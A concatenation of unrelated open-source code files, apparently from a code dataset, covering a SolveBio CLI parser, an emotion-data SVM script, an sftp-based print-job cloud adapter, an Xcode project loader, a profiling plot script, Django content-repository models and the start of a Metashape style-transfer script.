if values and values.startswith(home):
values = values.replace(home, '~', 1)
setattr(namespace, self.dest, values)
# KEY=VALUE argparser
# https://stackoverflow.com/a/56521375/305633
class KeyValueDictAppendAction(argparse.Action):
"""
argparse action to split an argument into KEY=VALUE form
on the first = and append to a dictionary.
"""
def __call__(self, parser, args, values, option_string=None):
assert(len(values) == 1)
try:
(k, v) = values[0].split("=", 2)
except ValueError:
raise argparse.ArgumentError(
self, "could not parse argument '{}' as k=v format"
.format(values[0]))
d = getattr(args, self.dest) or {}
d[k] = v
setattr(args, self.dest, d)
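# Example (sketch): `--metadata name=TCGA --metadata phase=beta` is collected into
# args.metadata == {'name': 'TCGA', 'phase': 'beta'} on the parsed namespace.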
class SolveArgumentParser(argparse.ArgumentParser):
"""
Main parser for the SolveBio command line client.
"""
subcommands = {
'login': {
'func': auth.login_and_save_credentials,
'help': 'Login and save credentials'
},
'logout': {
'func': auth.logout,
'help': 'Logout and delete saved credentials'
},
'whoami': {
'func': auth.whoami,
'help': 'Show your SolveBio email address'
},
'tutorial': {
'func': print_tutorial,
'help': 'Show the SolveBio Python Tutorial',
},
'shell': {
'func': launch_ipython_shell,
'help': 'Open the SolveBio Python shell'
},
'import': {
'func': data.import_file,
'help': 'Import a local file into a SolveBio dataset',
'arguments': [
{
'flags': '--create-vault',
'action': 'store_true',
'help': 'Create the vault if it doesn\'t exist',
},
{
'flags': '--create-dataset',
'action': 'store_true',
'help': 'Create the dataset if it doesn\'t exist',
},
{
'flags': '--capacity',
'default': 'small',
'help': 'Specifies the capacity of the created dataset: '
'small (default, <100M records), '
'medium (<500M), large (>=500M)'
},
{
'name': '--tag',
'help': 'A tag to be added. '
'Tags are case insensitive strings. Example tags: '
'--tag GRCh38 --tag Tissue --tag "Foundation Medicine"',
'action': 'append',
},
{
'name': '--metadata',
'help': 'Dataset metadata in the format KEY=VALUE ',
'nargs': 1,
'metavar': 'KEY=VALUE',
'action': KeyValueDictAppendAction
},
{
'name': '--metadata-json-file',
'help': 'Metadata key value pairs in JSON format'
},
{
'flags': '--template-id',
'help': 'The template ID used when '
'creating a new dataset (via --create-dataset)',
},
{
'flags': '--template-file',
'help': 'A local template file to be used when '
'creating a new dataset (via --create-dataset)',
},
{
'flags': '--follow',
'action': 'store_true',
'default': False,
'help': 'Follow the import\'s progress until it completes'
},
{
'flags': '--commit-mode',
'default': 'append',
'help': 'Commit mode to use when importing data. '
'Options are "append" (default), "overwrite",'
'"upsert", or "delete"'
},
{
'flags': '--remote-source',
'action': 'store_true',
'default': False,
'help': 'File paths are remote globs or full paths on '
'the SolveBio file system.'
},
{
'flags': '--dry-run',
'help': 'Dry run mode will not create any datasets or '
'import any files.',
'action': 'store_true'
},
{
'name': 'full_path',
'help': 'The full path to the dataset in the format: '
'"domain:vault:/path/dataset". ',
'action': TildeFixStoreAction
},
{
'name': 'file',
'help': 'One or more files to import. Can be local files, '
'folders, globs or remote URLs. Pass --remote-source in '
'order to list remote full_paths or path globs on the '
'SolveBio file system.',
'nargs': '+'
},
]
},
'create-dataset': {
'func': data.create_dataset,
'help': 'Create a SolveBio dataset',
'arguments': [
{
'flags': '--create-vault',
'action': 'store_true',
'help': 'Create the vault if it doesn\'t exist',
},
{
'flags': '--template-id',
'help': 'The template ID used when '
'creating a new dataset (via --create-dataset)',
},
{
'flags': '--template-file',
'help': 'A local template file to be used when '
'creating a new dataset (via --create-dataset)',
},
{
'flags': '--capacity',
'default': 'small',
'help': 'Specifies the capacity of the dataset: '
'small (default, <100M records), '
'medium (<500M), large (>=500M)'
},
{
'name': '--tag',
'help': 'A tag to be added. '
'Tags are case insensitive strings. Example tags: '
'--tag GRCh38 --tag Tissue --tag "Foundation Medicine"',
'action': 'append',
},
{
'name': '--metadata',
'help': 'Dataset metadata in the format KEY=VALUE ',
'nargs': 1,
'metavar': 'KEY=VALUE',
'action': KeyValueDictAppendAction
},
{
'name': '--metadata-json-file',
'help': 'Metadata key value pairs in JSON format'
},
{
'flags': '--dry-run',
'help': 'Dry run mode will not create the dataset',
'action': 'store_true'
},
{
'name': 'full_path',
'help': 'The full path to the dataset in the format: '
'"domain:vault:/path/dataset". '
'Defaults to your personal vault if no vault is provided. '
'Defaults to the vault root if no path is provided.',
'action': TildeFixStoreAction
},
]
},
'upload': {
'func': data.upload,
'help': 'Upload a file or directory to a SolveBio Vault',
'arguments': [
{
'flags': '--full-path',
'help': 'The full path where the files and folders should '
'be created, defaults to the root of your personal vault',
'action': TildeFixStoreAction,
'default': '~/'
},
{
'flags': '--create-full-path',
'help': 'Creates --full-path location if it does '
'not exist. NOTE: This will not create new vaults.',
'action': 'store_true',
},
{
'flags': '--exclude',
'help': 'Paths to files or folder to be excluded from '
'upload. Unix shell-style wildcards are supported.',
'action': 'append'
},
{
'flags': '--dry-run',
'help': 'Dry run mode will not upload any files or '
'create any folders.',
'action': 'store_true'
},
{
'name': 'local_path',
'help': 'The path to the local file or directory '
'to upload',
'nargs': '+'
}
]
},
'download': {
'func': data.download,
'help': 'Download one or more files from a SolveBio Vault.',
'arguments': [
{
'flags': '--dry-run',
'help': 'Dry run mode will not download any files or '
'create any folders.',
'action': 'store_true'
},
{
'flags': 'full_path',
'help': 'The full path to the files on SolveBio. Supports '
'Unix style globs in order to download multiple files. '
'Note: Downloads are not recursive.',
'action': TildeFixStoreAction
},
{
'name': 'local_path',
'help': 'The path to the local directory where '
'to download files.',
}
]
},
'tag': {
'func': data.tag,
'help': 'Apply tags or remove tags on objects',
'arguments': [
{
'flags': 'full_path',
'help': 'The full path of the files, '
'folders or datasets to apply the tag updates. '
'Unix shell-style wildcards are supported. ',
'nargs': '+'
},
{
'name': '--tag',
'help': 'A tag to be added/removed. '
'Files, folders and datasets can be tagged. '
'Tags are case insensitive strings. Example tags: '
'--tag GRCh38 --tag Tissue --tag "Foundation Medicine"',
'action': 'append',
'required': True
},
{
'flags': '--remove',
'help': 'Will remove tags instead of adding them.',
'action': 'store_true'
},
{
'flags': '--exclude',
'help': 'Paths to files or folder to be excluded from '
'tagging. Unix shell-style wildcards are supported.',
'action': 'append'
},
{
'flags': '--tag-folders-only',
'help': 'Will only apply tags to folders (tags '
'all objects by default). ',
'action': 'store_true'
},
{
'flags': '--tag-files-only',
'help': 'Will only apply tags to files (tags '
'all objects by default). ',
'action': 'store_true'
},
{
'flags': '--tag-datasets-only',
'help': 'Will only apply tags to datasets (tags '
'all objects by default). ',
'action': 'store_true'
},
{
'flags': '--dry-run',
'help': 'Dry run mode will not save tags.',
'action': 'store_true'
},
{
'flags': '--no-input',
'help': 'Automatically accept changes (overrides '
'user prompt)',
'action': 'store_true'
},
]
},
'queue': {
'func': data.show_queue,
'help': 'Shows the current job queue, grouped by User',
}
}
def __init__(self, *args, **kwargs):
super(SolveArgumentParser, self).__init__(*args, **kwargs)
self._optionals.title = 'SolveBio Options'
self.add_argument(
'--version',
action='version',
version=solvebio.version.VERSION)
self.add_argument(
'--api-host',
help='Override the default SolveBio API host',
type=self.api_host_url)
self.add_argument(
'--api-key',
help='Manually provide a SolveBio API key')
self.add_argument(
'--access-token',
help='Manually provide a SolveBio OAuth2 access token')
def _add_subcommands(self):
"""
The _add_subcommands method must be separate from the __init__
method, as infinite recursion will occur otherwise, due to the fact
that the __init__ method itself will be called when instantiating
a subparser, as we do below
"""
subcmd_params = {
'title': 'SolveBio Commands',
'dest': 'subcommands'
}
subcmd = self.add_subparsers(
**subcmd_params) # pylint: disable=star-args
subcommands = copy.deepcopy(self.subcommands)
for name, params in subcommands.items():
p = subcmd.add_parser(name, help=params['help'])
p.set_defaults(func=params['func'])
for arg in params.get('arguments', []):
name_or_flags = arg.pop('name', None) or arg.pop('flags', None)
p.add_argument(name_or_flags, **arg)
def parse_solvebio_args(self, args=None, namespace=None):
"""
Try to parse the args first, and then add the subparsers. We want
to do this so that we can check to see if there are any unknown
args. We can assume that if, by this point, there are no unknown
args, we can append shell to the unknown args as a default.
However, to do this, we have to suppress stdout/stderr during the
initial parsing, in case the user calls the help method (in which
case we want to add the additional arguments and *then* call the
        help method). This is a hack to get around the fact that argparse
doesn't allow default subcommands.
"""
try:
sys.stdout = sys.stderr = open(os.devnull, 'w')
_, unknown_args = self.parse_known_args(args, namespace)
if not unknown_args:
args.insert(0, 'shell')
except SystemExit:
pass
finally:
sys.stdout.flush()
sys.stderr.flush()
sys.stdout, sys.stderr = sys.__stdout__, sys.__stderr__
self._add_subcommands()
return super(SolveArgumentParser, self).parse_args(args, namespace)
def api_host_url(self, value):
validate_api_host_url(value)
return value
def main(argv=sys.argv[1:]):
""" Main entry point for SolveBio CLI """
parser = SolveArgumentParser()
args = parser.parse_solvebio_args(argv)
solvebio.login(
api_host=args.api_host or solvebio.api_host,
api_key=args.api_key or solvebio.api_key,
access_token=args.access_token or solvebio.access_token)
return args.func(args)
if __name__ == '__main__':
main()
| mit | -1,924,010,282,670,942,200 | 37.784091 | 79 | 0.438558 | false | 4.861823 | false | false | false |
luigivieira/fsdk | fsdk/detectors/test-emotions.py | 1 | 4073 | #!/usr/bin/env python
#
# This file is part of the Fun SDK (fsdk) project. The complete source code is
# available at https://github.com/luigivieira/fsdk.
#
# Copyright (c) 2016-2017, Luiz Carlos Vieira (http://www.luiz.vieira.nom.br)
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import os
import numpy as np
import pandas as pd
from sklearn import svm
from sklearn.model_selection import cross_val_score
from sklearn.metrics import accuracy_score, precision_score, recall_score
#---------------------------------------------
def readData(annotationPath):
##################################
# Read the data
##################################
print('Reading data...')
subjects = [1, 2, 4, 6, 7, 14, 15, 17, 18, 20, 21, 22, 23, 25, 26, 27, 30, 32, 33, 34, 37, 38, 39, 40, 41]
fileName = '{}/../subjects.csv'.format(annotationPath)
games = pd.read_csv(fileName, sep=',', usecols=[0, 5], index_col=0)
data = pd.DataFrame(columns=['neutral', 'happiness', 'sadness', 'anger',
'fear', 'surprise', 'disgust', 'game'])
for subject in subjects:
game = games.loc[subject]['Game Played']
print('subject: {} game: {}'.format(subject, game))
# Read the face data
name = '{}/player_{:03d}-face.csv' \
.format(annotationPath, subject)
face = pd.read_csv(name, index_col=0, usecols=(0, 1, 2, 3, 4, 142))
# Find the frames where the face detection failed
t = (face[[0, 1, 2, 3]] == 0).all(1)
fails = face[t].index[:]
# Read the emotion data
name = '{}/player_{:03d}-emotions.csv' \
.format(annotationPath, subject)
df = pd.read_csv(name, index_col=0)
# Drop the rows where face detection failed
df = df.drop(fails)
# Add the game column
df['game'] = [game for _ in range(len(df))]
        # Rename the columns to match the returned DataFrame format
df.columns = ['neutral', 'happiness', 'sadness', 'anger', 'fear',
'surprise', 'disgust', 'game']
# Append to the data read
data = data.append(df)
return data
#---------------------------------------------
def main():
# Read the data
annotationPath = 'C:/Users/luigi/Dropbox/Doutorado/dataset/annotation'
data = readData(annotationPath)
# Split the data into features (x) and labels (y)
df = data[['neutral', 'happiness', 'sadness', 'anger', 'fear', 'surprise',
'disgust']]
x = np.array(df.values.tolist())
y = np.array(data['game'].tolist())
# Create the SVM classifier
clf = svm.SVC(kernel='rbf', gamma=0.001, C=10, decision_function_shape='ovr')
# Perform the cross validation
scores = cross_val_score(clf, x, y, cv=5, n_jobs=-1)
print(scores)
return 0
#---------------------------------------------
# namespace verification for running this script
#---------------------------------------------
if __name__ == '__main__':
sys.exit(main()) | mit | -7,315,364,115,541,169,000 | 34.736842 | 110 | 0.605696 | false | 3.81367 | false | false | false |
danianr/NINJa | cloudadapter.py | 1 | 8320 | from socket import *
from datetime import *
from subprocess import Popen, PIPE
from collections import deque
import sys
import os
import time
import random
import copy
class IndexView(object):
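   # Read-only, lazily refreshed snapshot of a user's job index: wraps the list
   # returned by indexFunc(username), re-queries it at most once per `delay`
   # seconds (or when marked dirty), and renders entries through displayFunc.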
def __init__(self, username, indexFunc, displayFunc):
self.username = username
self.timestamp = time.time()
self.indexFunc = indexFunc
self.displayFunc = displayFunc
self.internal = self.indexFunc(username)
self.refreshReq = deque()
self.dirty = False
self.delay = 120
def refresh(self, event=None):
now = time.time()
self.refreshReq.append(now)
for req in self.refreshReq:
if (req + self.delay) < now or self.dirty:
break
else:
return
self.internal = self.indexFunc(self.username)
self.timestamp = now
self.refreshReq.clear()
def isDirty(self):
return self.dirty
def setDirty(self):
self.dirty = True
def map(self, iterable):
return map(lambda i: self.internal[int(i)], iterable)
# Only define getter accessors since this is technically
# a read-only snapshot
def __getitem__(self, x):
return self.internal[x]
def __getslice__(self, x, y):
return self.internal[x:y]
def __len__(self):
return len(self.internal)
def __iter__(self):
return iter(map(self.displayFunc, self.internal))
class CloudAdapter(object):
def __init__(self, path, maxsize=2147483647):
self.controlpath = path
self.sftp = '/usr/bin/sftp'
self.landing = '/svc/landing'
self.remote_path = '/svc/remote'
self.maxsize = maxsize
if not os.path.exists(self.controlpath):
e = OSError()
e.errno=2
e.strerror='No such file or directory'
e.filename=path
raise e
def _topoCalc(self, gridlist):
print >> sys.stderr, time.time(), "Entrance into CloudAdapter._topoCalc(", repr(gridlist), ")"
remaining = copy.copy(gridlist)
topolist = []
thishost = getfqdn()
if thishost in remaining:
remaining.remove(thishost)
topolist.append(thishost)
for timeoutval in [ 0.000260, 0.000650, 0.002000 ]:
for node in remaining:
s = socket()
s.settimeout(timeoutval)
iaddr = ( gethostbyname(node), 22 )
try:
s.connect(iaddr)
s.close()
topolist.append(node)
remaining.remove(node)
except timeout:
print >> sys.stderr, time.time(), 'Unable to connect to node %s within %fs\n' % (node, timeoutval)
topolist.extend(remaining)
print >> sys.stderr, time.time(), "Return from CloudAdapter._topoCalc => ", repr(topolist)
return topolist
def _getfile(self, cmd):
s = socket(AF_UNIX, SOCK_STREAM, 0)
s.connect(self.controlpath)
s.sendall(cmd)
return s.makefile()
def _retrieve(self, node, username, sha512):
command_script = 'cd %s/%s\nget %s\nexit\n' % (self.remote_path, username, sha512)
return self._sftp_wrapper(node, command_script)
def _store(self, node, username, sha512, file):
command_script = 'mkdir %s/%s\ncd %s/%s\nput %s %s\nexit\n' % (self.remote_path,
username, self.remote_path, username, file, sha512)
return self._sftp_wrapper(node, command_script)
def _sftp_wrapper(self, node, command_script):
print >> sys.stderr, time.time(), '_sftp_wrapper(%s, %s, %s)' % (self, node, command_script)
p = Popen( [self.sftp, node], stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=False, bufsize=1024, cwd=self.landing)
p.communicate(command_script)
maxtime = time.time() + 36
while ( time.time() < maxtime ):
retstatus = p.poll()
print >> sys.stderr, time.time(), "_sftp_wrapper.retstatus = ", retstatus
if retstatus == 0:
return True
elif retstatus is None:
time.sleep(2)
else:
return False
p.kill()
return False
def registerGridList(self, gridlist):
self.topolist = self._topoCalc(gridlist)
self.gridlist = gridlist
def getHeaders(self, username):
cmd = 'return %s' % (username,)
sock = self._getfile(cmd)
rawheaders = sock.readlines()
sock.close()
return rawheaders
def getIndex(self, username):
index = []
for raw in self.getHeaders(username):
(uuid, sha512, created, pageinfo, ipaddr,
printer, username, title ) = raw.split('\034', 8)
created = datetime.fromtimestamp(int(created))
pageinfo = int(pageinfo)
if (pageinfo % 2 == 0):
duplex = False
else:
duplex = True
sheets = pageinfo >> 1
if printer is not None and printer != '0.0.0.0':
try:
(printer, aliases, ip_list) = gethostbyaddr(printer)
except:
printer = 'UNKNOWN'
else:
printer = 'UNKNOWN'
if ipaddr is not None and ipaddr != '0.0.0.0':
try:
(client, aliases, ip_list) = gethostbyaddr(ipaddr)
except:
client = 'unknown'
else:
client = 'localhost'
index.append((uuid, sha512, created, sheets, duplex, client, printer, username, title))
return index
def indexStr(self, tuple):
(uuid, sha512, created, sheets, duplex, client, printer, username, title) = tuple
expiretime = created + timedelta(0, 14400) # four hours from time created
return '%-32s %-12s %6s %15s' % (title[:32], printer.partition('-')[0], sheets, expiretime.strftime('%a %I:%M:%S %p'))
def retrieveJob(self, username, sha512, gridlist=None):
userrand = random.Random()
userrand.seed(username)
# Can't reference a member of an argument as a default value
if gridlist is None:
gridlist = self.gridlist
if gridlist is not None:
try:
nodes = userrand.sample(gridlist, 3)
nodes = filter(lambda h: h in nodes, self.topolist)
except ValueError:
nodes = gridlist[0:3]
else:
nodes = ('localhost',)
for node in nodes:
         print >> sys.stderr, 'retrieveJob trying node: ', node
if self._retrieve(node, username, sha512):
print >> sys.stderr, time.time(), 'job %s/%s successfully retrieved from %s\n' % (username, sha512, node)
localfile = self.landing + os.sep + sha512
if os.path.exists(localfile):
return localfile
else:
print >> sys.stderr, time.time(), "unable to locate ", localfile
else:
            print >> sys.stderr, time.time(), 'unable to retrieve job %s/%s from node %s\n' % (username, sha512, node)
self.topolist.remove(node)
self.topolist.append(node)
return None
def storeJob(self, job, gridlist=None):
if job.size > self.maxsize:
print >> sys.stderr, time.time(), 'Not attempting to store job:%d size (%d bytes) is larger than allowed\n' % (job.jobId, job.size)
job.removeTmpFile()
return
username = job.username
sha512 = job.sha512
tmpfile = job.tmpfile
userrand = random.Random()
userrand.seed(username)
# Can't reference a member of an argument as a default value
if gridlist is None:
gridlist = self.gridlist
if gridlist is not None:
try:
nodes = userrand.sample(gridlist, 3)
except ValueError:
nodes = gridlist[0:3]
pid = Popen(["/home/dcedev/ninja/sftp_push.sh", username, tmpfile, sha512, nodes[0], nodes[1], nodes[2]]).pid
print >> sys.stderr, time.time(), repr(["/home/dcedev/ninja/sftp_push.sh", username, tmpfile, sha512, nodes[0], nodes[1], nodes[2]]), pid
else:
nodes = ('localhost',)
| mit | -3,009,904,633,007,559,000 | 32.28 | 148 | 0.563822 | false | 3.913452 | false | false | false |
samdmarshall/pyXcode | pyXcode/xcodeproj.py | 1 | 2091 | import os
import sys
# importing the pbProj module
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'pbProj'))
from pbProj import pbProj
# importing the xcscheme module
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'pyxcscheme'))
from pyxcscheme import xcscheme
from Helpers import Logger
class xcodeproj(object):
def __init__(self, xcodeproj_file_path):
if os.path.exists(xcodeproj_file_path):
if xcodeproj_file_path.endswith(('.xcodeproj', '.pbproj')):
self.filePath = xcodeproj_file_path
# loading the pbxproj
pbxproj_file_path = os.path.join(self.filePath, 'project.pbxproj')
if os.path.exists(pbxproj_file_path):
self.projectFile = pbProj.PBXProj(pbxproj_file_path)
else:
Logger.write().error('Could not find the pbxproj file!')
# load schemes
self.schemes = xcscheme.LoadSchemes(self.filePath)
else:
Logger.write().error('Not a Xcode project file!')
else:
Logger.write().error('Could not find the Xcode project file!')
def projects(self):
return self.projectFile.projects()
def hasSchemeWithName(self, scheme_name):
"""
This method is used for both 'xcworkspace' and 'xcodeproj' classes. It returns a two
element tuple that contains the following:
First element:
A 'True' or 'False' value indicating if a scheme with the passed name was found in
this project or workspace file.
Second element:
The scheme object if a scheme with matching name was found, None otherwise.
"""
found_scheme = None
scheme_filter = filter(lambda scheme: scheme.name == scheme_name, self.schemes)
if len(scheme_filter) > 0:
found_scheme = scheme_filter[0]
return (found_scheme != None, found_scheme) | bsd-3-clause | 7,207,501,181,567,734,000 | 36.357143 | 95 | 0.596365 | false | 4.293634 | false | false | false |
nbigaouette/sorting | profiling/plot.py | 1 | 1144 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import glob
import re
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
if len(sys.argv) == 1:
print('Usage: plot.py path/to/build/profiling')
sys.exit(1)
csv_files = glob.glob(os.path.join(sys.argv[1], '*.csv'))
if (len(csv_files) == 0):
print('No csv found in ' + sys.argv[1] + '!')
sys.exit(1)
fig = plt.figure()
ax = fig.add_subplot(111)
colors = iter(plt.cm.rainbow(np.linspace(0,1,len(csv_files))))
p = re.compile(r'profiling_(.*?)_(.*?)\.csv')
ms_to_s = 1.0 / 1000.0
for csv_file in csv_files:
data = np.genfromtxt(csv_file, delimiter=',', skip_header=1).transpose()
j = data[0]
N = data[1]
avg = data[2]
std = data[3]
m = p.search(csv_file)
name = m.group(2)
name = name.replace('_', ' ')
ax.errorbar(N, avg*ms_to_s, yerr=std*ms_to_s,
label=name, color=next(colors), marker='o')
ax.grid(True)
ax.set_xlabel('N')
ax.set_ylabel('Timing [s]')
ax.set_xscale('log', basex=2)
ax.set_yscale('log')
xlims = ax.get_xlim()
ax.set_xlim(xlims[0]/2, xlims[1]*2)
ax.legend(loc='best')
plt.show()
| bsd-3-clause | 763,205,658,088,627,300 | 21 | 76 | 0.603147 | false | 2.503282 | false | false | false |
motherjones/mirrors | mirrors/models.py | 1 | 11917 | import datetime
import re
import sys
from django.dispatch import receiver
from django.contrib.auth.models import User
from django.db import models
from django.db.models import Max
from django.utils.timezone import utc
from django.utils import timezone
from django.core.urlresolvers import reverse
from jsonfield import JSONField
from mirrors.exceptions import LockEnforcementError
class Component(models.Model):
"""A ``Component`` is the basic type of object for all things in the Mirrors
content repository. Anything that has a presence in the final output of the
website is made of at least one ``Component`` object, and will generally be
    made from several.
.. warning :: The implementation of this class is incomplete and may change
in the future.
"""
slug = models.SlugField(max_length=100, unique=True)
content_type = models.CharField(max_length=50, default='none')
schema_name = models.CharField(max_length=50, null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
@property
def data_uri(self):
"""Get the URI for this ``Component``.
:rtype: str
"""
if self.binary_data is not None:
return reverse('component-data', kwargs={'slug': self.slug})
else:
return None
@property
def metadata(self):
"""Get the current metadata from the most recent revision of the
component.
:rtype: dict
"""
return self.metadata_at_version(self.max_version)
@property
def binary_data(self):
"""Get the data from the most recent revision of the data.
:rtype: bytes
"""
try:
return self.binary_data_at_version(self.max_version)
except IndexError:
return None
@property
def max_version(self):
"""Get the version number for the most recent revision.
:rtype: int
.. note :: If there are no revisions, max_version will be 0
"""
version = self.revisions.all().aggregate(Max('version'))
if version['version__max'] is None:
return 0
else:
return version['version__max']
def _version_in_range(self, version):
return (version > 0) and (version <= self.max_version)
def new_revision(self, data=None, metadata=None):
"""Create a new revision for this ``Component`` object. If the data is not in
the correct format it will attempt to convert it into a bytes object.
Passing None for one of the arguments will result in that data not
being changed.
:param data: the actual content of the new revision
:type data: bytes
:param metadata: the new metadata
:type metadata: dict
:rtype: :class:`ComponentRevision`
:raises: :class:`ValueError`
"""
if not data and not metadata:
raise ValueError('no new revision data was actually provided')
next_version = 1
cur_rev = self.revisions.all().order_by('-version').first()
if cur_rev is not None:
next_version = cur_rev.version + 1
new_rev = ComponentRevision.objects.create(
data=data,
metadata=metadata,
component=self,
version=next_version
)
new_rev.save()
return new_rev
def new_attribute(self, name, child, weight=-1):
"""Add a new named attribute to the ``Component`` object. This will overwrite
an attribute if the child is unchanged. However, if the child has a
different slug, then the attribute will be converted into an ordered
list and the child component added to it.
:param name: the attribute's name, which can only contain alphanumeric
characters as well as the - and _ characters.
:type name: str
:param child: the `Component` object to associate with that name
:type child: `Component`
:param weight: the weight of the child within the ordered list, if the
attribute is one
:type weight: int
:rtype: :class:`ComponentAttribute` or a list
"""
if not child or child == self:
raise ValueError('child cannot be None or self')
if not re.match('^\w[-\w]*$', name):
raise KeyError('invalid attribute name')
        # attr never gets used again... just commented this out for now
# if self.attributes.filter(name=name).count() == 1:
# attr = self.attributes.get(name=name)
        new_attr = ComponentAttribute(
            name=name,
            parent=self,
            child=child,
            weight=weight
        )
        new_attr.save()
        return new_attr
def get_attribute(self, attribute_name):
"""Retrieve the `Component` object attached to this one by the
attribute name if it is a regular attribute, or a list if it contains
more than one
:param attribute_name: name of the attribute
:type attribute_name: str
:rtype: `Component` or list
"""
attrs = self.attributes.filter(name=attribute_name)
if attrs.count() == 0:
raise KeyError("no such attribute '{}'".format(attribute_name))
elif attrs.count() == 1:
attr = attrs.first()
if attr.weight == -1:
return attr.child
else:
return [attr.child]
elif attrs.count() > 1:
return [attr.child for attr in attrs.order_by('weight')]
def metadata_at_version(self, version):
"""Get the metadata for the :class:`Component` as it was at the
provided version.
:param version: The version of the `Component` that you want to get
the metadata for.
:type version: int
:rtype: dict
:raises: :class:`IndexError`
"""
if not self._version_in_range(version):
raise IndexError('No such version')
qs = self.revisions.filter(metadata__isnull=False,
version__lte=version).order_by('-version')
rev = qs.first()
if rev is not None:
return rev.metadata
else:
return {}
def binary_data_at_version(self, version):
"""Get the binary data for the :class:`Component` as it was at the
provided version.
:param version: The version of the `Component` that you want to get
the binary data for.
:type version: int
:rtype: bytes
:raises: :class:`IndexError`
"""
if not self._version_in_range(version):
raise IndexError('No such version')
qs = self.revisions.filter(data__isnull=False,
version__lte=version).order_by('-version')
rev = qs.first()
if rev is not None:
return bytes(rev.data)
else:
return None
@property
def lock(self):
now = datetime.datetime.utcnow().replace(tzinfo=utc)
cur_lock = self.locks.exclude(broken=True)
cur_lock = cur_lock.exclude(lock_ends_at__lte=now)
if cur_lock.count() > 0:
return cur_lock.first()
else:
return None
def lock_by(self, user, lock_period=60):
"""Lock the :class:`Component`, preventing other users from altering it
until the lock expires.
:param value: The user that has requested the lock be created.
:type User: :class:`User`
:rtype: :class:`ComponentLock`
"""
if self.lock is not None:
raise LockEnforcementError(locking_user=self.lock.locked_by,
ends_at=self.lock.lock_ends_at)
lock = ComponentLock()
t_delta = datetime.timedelta(minutes=lock_period)
now = datetime.datetime.utcnow().replace(tzinfo=utc)
lock.component = self
lock.locked_by = user
lock.lock_ends_at = now + t_delta
lock.save()
return lock
def unlock(self, unlocking_user):
"""Unlock the :class:`Component`.
:param unlocking_user: The user that has requested the lock be broken.
:type unlocking_user: :class:`User`
"""
# TODO: right now we don't care who breaks a lock, but eventually
# authorization will have to be implemented
# we have to assign self.lock to a new variable because if we don't,
# because otherwise it'll keep executing SQL queries
lock = self.lock
if lock is not None:
lock.broken = True
lock.save()
def __str__(self):
return self.slug
class ComponentAttribute(models.Model):
"""A named connection between a :class:`Component` and one or more other
``Component`` objects that are considered to be attributes of the
first. Some examples of that might include an attribute named "author" that
connects an article ``Component`` to the ``Component`` that contains
information about its author.
.. warning :: The implementation of this class is incomplete and may change
in the future.
"""
parent = models.ForeignKey('Component', related_name='attributes')
child = models.ForeignKey('Component')
name = models.CharField(max_length=255)
weight = models.IntegerField(null=False, default=-1)
added_time = models.DateTimeField(auto_now_add=True)
def __str__(self):
if self.weight != -1:
return "{}[{},{}] -> {}".format(self.parent.slug,
self.name,
self.weight,
self.child.slug)
else:
return "{}[{}] = {}".format(self.parent.slug,
self.name,
self.child.slug)
class ComponentRevision(models.Model):
"""A revision of the data and metadata for a :class:`Component`. It contains
the binary data itself. Every time a ``Component``'s data is updated, a new
``ComponentRevision`` is created.
.. warning :: The implementation of this class is incomplete and may change
in the future.
"""
data = models.BinaryField(null=True, blank=True)
metadata = JSONField(default=None, null=True, blank=True)
version = models.IntegerField(null=False)
created_at = models.DateTimeField(auto_now_add=True)
component = models.ForeignKey('Component', related_name='revisions')
def __str__(self):
return "{} v{}".format(self.component.slug, self.version)
class ComponentLock(models.Model):
""" Determines whether a ``Component`` can be edited.
"""
locked_by = models.ForeignKey(User)
locked_at = models.DateTimeField(auto_now_add=True)
lock_ends_at = models.DateTimeField()
component = models.ForeignKey('Component', related_name='locks')
broken = models.BooleanField(default=False)
def extend_lock(self, *args, **kwargs):
"""Extend the life time of the current lock. The arguments excepted are the
same as what is acceptable for use when creating a
:class:`datetime.timedelta` object.
:raises: :class:`ValueError`
"""
delta = datetime.timedelta(**kwargs)
if delta.total_seconds() < 0:
raise ValueError()
self.lock_ends_at = self.lock_ends_at + delta
self.save()
def __str__(self):
return "{} locked by {} until {}".format(self.component.slug,
self.locked_by.username,
self.lock_ends_at)
| mit | -1,367,688,952,275,133,000 | 32.102778 | 85 | 0.592683 | false | 4.478392 | false | false | false |
agisoft-llc/photoscan-scripts | src/model_style_transfer.py | 1 | 22320 | # This is a Python script for Metashape Pro. Scripts repository: https://github.com/agisoft-llc/metashape-scripts
#
# Based on https://colab.research.google.com/github/tensorflow/lucid/blob/master/notebooks/differentiable-parameterizations/style_transfer_3d.ipynb
# Modifications:
# 1. Taking into account cameras positions (when possible) instead of meshutil.sample_view(10.0, 12.0)
# 2. Integration with Metashape Pro to make usage easier
#
# Note that you need to:
# 1. Install CUDA 9.0 and cuDNN for CUDA 9.0
# 2. In Python bundled with Metashape install these packages: tensorflow-gpu==1.9.0 lucid==0.2.3 numpy==1.15.0 Pillow==5.2.0 matplotlib==2.2.2 ipython==6.5.0 PyOpenGL==3.1.0 jupyter==1.0.0
#
# Installation and usage instruction: http://www.agisoft.com/index.php?id=54
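# For reference, a typical install command for the packages above (sketch; the exact
# path to Metashape's bundled Python interpreter depends on your installation):
#   <metashape-python> -m pip install tensorflow-gpu==1.9.0 lucid==0.2.3 numpy==1.15.0 \
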